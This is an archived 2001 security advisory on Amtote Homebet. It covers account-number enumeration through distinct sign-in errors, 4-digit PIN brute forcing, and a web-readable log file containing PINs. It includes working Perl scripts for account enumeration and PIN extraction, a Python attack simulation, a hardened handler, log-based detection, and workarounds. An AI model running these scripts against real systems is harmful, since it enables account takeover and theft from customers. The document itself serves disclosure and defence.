[NT] Vulnerability in Amtote International Homebet Self Service Wagering System
From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Vulnerability in Amtote International Homebet Self Service Wagering System
Message-Id: <20010930223831.9A604138C2@mail.der-keiler.de>
Date: Mon, 1 Oct 2001 00:38:31 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Vulnerability in Amtote International Homebet Self Service Wagering System
------------------------------------------------------------------------
SUMMARY
Amtote Homebet (<http://www.amtote.com/products.htm>) is an Internet-based
account wagering interface built from HTML and Java web applications. The
HTML functionality includes viewing current account balances, viewing current
odds by track, placing wagers, reviewing wagers, and viewing official
results/prices by track. The Java application is designed for faster
single-screen wagering and allows viewing of account balances and current
odds for a selected track. Two security vulnerabilities in the default
version of the product allow sensitive PINs to be compromised (they are
stored in a file readable over the web) and easily brute forced (the sign-in
page reveals whether an account number exists, so an automated script can
enumerate accounts and then attack the 4-digit PIN of each).
DETAILS
1. Account and PIN combination authentication
On the machines that were tested, the login page
http://target/homebet/homebet.dll?form=menu&option=menu-signin relies on
two numeric components to authenticate: an account number and a 4-digit
PIN. Apart from the fact that the credentials are sent in plain text over
HTTP, the main problem is that the error page returned for a bad account
number ("ACCOUNT NUMBER IS NOT DEFINED") differs from the page returned for
a bad PIN. The two components can therefore be attacked independently:
first enumerate valid account numbers with a dummy PIN, then try at most
10,000 PINs against each account found, which an automated script does
quickly. A Perl script that finds valid account numbers is attached below.
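The sign-in oracle described above, as an added example that is not part of the advisory or of Amtote's code: a handler that behaves like the tested installation, a simulated attacker that splits the credential into two independent searches, and a hardened handler that removes the oracle. The account numbers, PINs, lockout threshold and the "INVALID PIN" / "SIGN-IN FAILED" strings are constructed for the example; only "ACCOUNT NUMBER IS NOT DEFINED" is taken from the advisory's script.

```python
"""Added example (not part of the advisory or of Amtote's code): the sign-in
oracle, a simulated attacker that uses it, and a hardened handler without it.
Account numbers, PINs, MAX_FAILURES and the "INVALID PIN"/"SIGN-IN FAILED"
strings are constructed; only "ACCOUNT NUMBER IS NOT DEFINED" is from the
advisory's script."""
import hashlib
import hmac
import os

# Constructed test accounts (account number -> 4-digit PIN).
ACCOUNTS = {"1001": "4821", "1002": "0007", "1003": "9999"}
PIN_SPACE = [f"{i:04d}" for i in range(10000)]   # the whole 4-digit PIN space


# --- Vulnerable handler: behaves as the tested installation did --------------
def vulnerable_sign_in(account, pin):
    """Distinct error for unknown account vs. wrong PIN, clear-text PIN
    comparison, no limit on failed attempts."""
    if account not in ACCOUNTS:
        return "ACCOUNT NUMBER IS NOT DEFINED"
    if ACCOUNTS[account] != pin:
        return "INVALID PIN"
    return "WELCOME"


# --- Attacker side: two independent searches instead of one ------------------
def enumerate_accounts(sign_in, candidates):
    """Step 1: one request per candidate account with a dummy PIN. Any response
    that differs from the one for a surely-bogus account means the account exists."""
    baseline = sign_in("0000000000", "0000")      # constructed bogus account
    return [a for a in candidates if sign_in(a, "0000") != baseline]


def brute_force_pin(sign_in, account):
    """Step 2: at most 10,000 requests against one confirmed account."""
    for pin in PIN_SPACE:
        if sign_in(account, pin) == "WELCOME":
            return pin
    return None


# --- Hardened handler -------------------------------------------------------
MAX_FAILURES = 5                      # per-account lockout threshold (assumed policy)
_SALT = os.urandom(16)                # one salt for brevity; use one per account in practice
_failures = {}


def _hash_pin(pin):
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), _SALT, 100_000)


HASHED = {acct: _hash_pin(p) for acct, p in ACCOUNTS.items()}   # no clear-text PINs kept
_DUMMY = _hash_pin("0000")            # unknown accounts cost the same work as known ones


def hardened_sign_in(account, pin):
    """Same error for every failure, per-account lockout, hashed PINs,
    constant-time comparison, no timing difference for unknown accounts."""
    if _failures.get(account, 0) >= MAX_FAILURES:
        return "SIGN-IN FAILED"
    stored = HASHED.get(account, _DUMMY)
    ok = hmac.compare_digest(stored, _hash_pin(pin)) and account in HASHED
    if not ok:
        _failures[account] = _failures.get(account, 0) + 1
        return "SIGN-IN FAILED"
    _failures.pop(account, None)
    return "WELCOME"


if __name__ == "__main__":
    cands = [str(n) for n in range(1000, 1010)]
    print("vulnerable, accounts found:", enumerate_accounts(vulnerable_sign_in, cands))
    print("vulnerable, PIN for 1002:", brute_force_pin(vulnerable_sign_in, "1002"))
    print("hardened, accounts found:", enumerate_accounts(hardened_sign_in, cands))
    print("hardened, PIN for 1002:", brute_force_pin(hardened_sign_in, "1002"))
```

Against the vulnerable handler the attacker needs one request per candidate account plus at most 10,000 per confirmed account; against the hardened one every failure looks the same, the dummy hash keeps the response time of an unknown account equal to that of a known one, and the lockout caps the PIN search at MAX_FAILURES guesses. A per-account lockout lets an attacker lock out real customers, so a production deployment usually pairs it with per-client rate limiting or progressive delays rather than a hard block.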
2. Read access to homebet.log
The machines that were tested also ran IIS 4. In fact the installation was
old enough to still include the RDS vulnerability
(<http://www.securiteam.com/windowsntfocus/2RUQMPPRPU.html>), which allowed
us to do a bit of exploring. A log file containing account numbers and PINs
is stored in the /homebet/ virtual directory, e.g.
http://target/homebet/homebet.log. Because it sits under a web-served
directory it can be fetched with a plain GET, and it contains all the
information needed to go gambling with other people's money. A script to
print accounts and PINs from the downloaded log file can be found below.
Workaround:
Change the ACL on homebet.log so that the IIS anonymous account
(IUSR_<machinename>) has no access. This only stops anonymous web clients
from reading the file: the log should also be moved out of any web-served
directory, and the application should not write PINs to a log at all. For
the sign-in page, return the same error page for an unknown account and for
a wrong PIN, limit failed attempts, and serve the page over SSL so the
account number and PIN are not sent in plain text.
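Detection logic for both issues, as an added example that is not part of the advisory: it runs over IIS W3C extended log lines and flags anyone reading a .log file under /homebet/, a probe of the RDS endpoint, and a client issuing many sign-in POSTs in a short window. The log lines are constructed for this example; the field layout is the standard W3C extended format IIS can be configured to write. The RDS endpoint path /msadc/msadcs.dll is the well-known one for the RDS vulnerability the advisory refers to but does not name, and the threshold and window are assumed values.

```python
"""Added example (not part of the advisory): detection over IIS W3C extended
log lines for the log-file exposure and the sign-in brute force. The log
lines are constructed; /msadc/msadcs.dll is the well-known RDS endpoint path,
which the advisory does not name; BRUTE_THRESHOLD and BRUTE_WINDOW are assumed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

BRUTE_THRESHOLD = 20                  # sign-in POSTs from one client ...
BRUTE_WINDOW = timedelta(seconds=60)  # ... within this window trips the alert

# Constructed sample: a brute force from 10.1.1.50, a successful fetch of
# homebet.log, a fetch denied after the ACL change, an RDS probe, and a
# normal user signing in from 10.1.1.20.
_HEADER = [
    "#Software: Microsoft Internet Information Server 4.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
]
_BRUTE = [f"2001-09-28 22:10:{3 + i:02d} 10.1.1.50 POST /homebet/homebet.dll - 200"
          for i in range(25)]
_OTHER = [
    "2001-09-28 22:10:01 10.1.1.50 GET /homebet/homebet.dll form=menu&option=menu-signin 200",
    "2001-09-28 22:11:30 10.1.1.77 GET /homebet/homebet.log - 200",
    "2001-09-28 22:11:45 10.1.1.78 GET /homebet/homebet.log - 401",
    "2001-09-28 22:12:00 10.1.1.90 GET /msadc/msadcs.dll - 200",
    "2001-09-28 22:15:00 10.1.1.20 POST /homebet/homebet.dll - 200",
    "2001-09-28 22:15:20 10.1.1.20 POST /homebet/homebet.dll - 200",
]
SAMPLE_LOG = "\n".join(_HEADER + _OTHER[:1] + _BRUTE + _OTHER[1:]) + "\n"


def parse_w3c(log_text):
    """Yield one dict per request line, naming fields from the #Fields: directive."""
    fields = None
    for raw in log_text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw.strip() or raw.startswith("#") or fields is None:
            continue
        parts = raw.split()
        if len(parts) != len(fields):
            continue                   # malformed line; skip rather than misalign
        yield dict(zip(fields, parts))


def detect(log_text):
    """Return (alert, client-ip, uri-stem) tuples for the patterns above."""
    alerts = []
    posts = defaultdict(deque)         # per-IP sliding window of sign-in POST times
    already_flagged = set()
    for rec in parse_w3c(log_text):
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        ip, method = rec["c-ip"], rec["cs-method"]
        stem, status = rec["cs-uri-stem"].lower(), rec["sc-status"]

        # Issue 2: any read of a .log under /homebet/. A 200 means the file is
        # exposed; anything else means someone is still trying after the ACL fix.
        if stem.startswith("/homebet/") and stem.endswith(".log"):
            alerts.append(("log-exposed" if status == "200" else "log-probe", ip, stem))

        if stem == "/msadc/msadcs.dll":
            alerts.append(("rds-probe", ip, stem))

        # Issue 1: IIS does not log POST bodies, so key on the rate of sign-in
        # POSTs per client instead of on the account numbers tried.
        if method == "POST" and stem == "/homebet/homebet.dll":
            window = posts[ip]
            window.append(ts)
            while window and ts - window[0] > BRUTE_WINDOW:
                window.popleft()
            if len(window) >= BRUTE_THRESHOLD and ip not in already_flagged:
                already_flagged.add(ip)
                alerts.append(("signin-bruteforce", ip, stem))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

Because the sign-in parameters travel in the POST body, which IIS does not log, the brute-force rule can only key on request volume per client; an attacker spreading the attempts over many source addresses would need correlation on the application side (for example, counting failures per account), which is another reason to add the lockout in the application itself.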
Exploit:
Amtote brute force
# Enumerates valid Homebet account numbers: an unknown account yields the
# "ACCOUNT NUMBER IS NOT DEFINED" page, any other response means the account
# exists (the dummy PIN 0000 was merely wrong, or happened to be right).
# Usage: perl amtote.pl host[:port]   (candidate accounts read from accounts.txt)
use strict;
use warnings;
use IO::Socket::INET;

if (@ARGV < 1) {
    die "Account cracker\n Usage = IP/host:Port e.g. perl $0 www.example.com\n";
}
my ($host, $port) = split /:/, $ARGV[0];
$port ||= 80;
my $accountfile = "accounts.txt";   # file containing candidate account numbers, one per line

# Build the sign-in POST for one account. HTTP/1.0 with "Connection: close"
# makes the server close the socket so sendraw can read to EOF, and the
# Content-Length is computed from the actual body instead of being hard-coded.
sub build_request {
    my ($account) = @_;
    my $body = 'form=open&account=' . $account . '&pin=0000';
    return join "\r\n",
        'POST /homebet/homebet.dll HTTP/1.0',
        'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-comet, */*',
        "Referer: http://$host/homebet/homebet.dll?form=menu&option=menu-signin",
        'Accept-Language: en-gb',
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; fs_pb_ie5)',
        "Host: $host",
        'Content-Length: ' . length($body),
        'Connection: close',
        'Cache-Control: no-cache',
        '',
        $body;
}

open(my $accounts, '<', $accountfile) or die "can't open account file $accountfile\n";
my @found;
while (my $a = <$accounts>) {
    chomp $a;
    next if $a eq '';
    print "Cracking account number $a\n";
    my @retrn = sendraw(build_request($a));
    my $defined = 1;
    foreach my $line (@retrn) {
        if ($line =~ /ACCOUNT NUMBER IS NOT DEFINED/) { $defined = 0; last; }
    }
    if ($defined) {
        print "found valid account number $a\n";
        push @found, $a;
    }
}
close($accounts);
print "Valid account numbers: @found\n" if @found;

################### sendraw sub
# Sends a raw request and returns the whole response (headers and body)
# as a list of lines.
sub sendraw {
    my ($pstr) = @_;
    my $s = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')
        or die "Can't connect...\n";
    $s->autoflush(1);
    print $s $pstr;
    my @in = <$s>;
    close($s);
    return @in;
}
Log file processor:
# Prints account/PIN pairs from a downloaded homebet.log. The log is assumed
# to contain the sign-in parameters as submitted ("account=NNNN" and
# "pin=NNNN" somewhere on the line); the two are matched independently so
# their order on the line does not matter.
use strict;
use warnings;

my $logfile = 'c:\windows\desktop\homebet.log';   ## change as required

print "Extracting account/PIN numbers\n";
open(my $in, '<', $logfile) or die "can't open $logfile: $!\n";
while (my $line = <$in>) {
    my ($accn) = $line =~ /account=(\d+)/;
    my ($pin)  = $line =~ /pin=(\d+)/;
    if (defined $accn && defined $pin) {
        print "Account Number=$accn PIN=$pin\n";
    }
}
close($in);
ADDITIONAL INFORMATION
The information has been provided by <mailto:GaryO@sec-1.com> Gary
O'leary-Steele.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.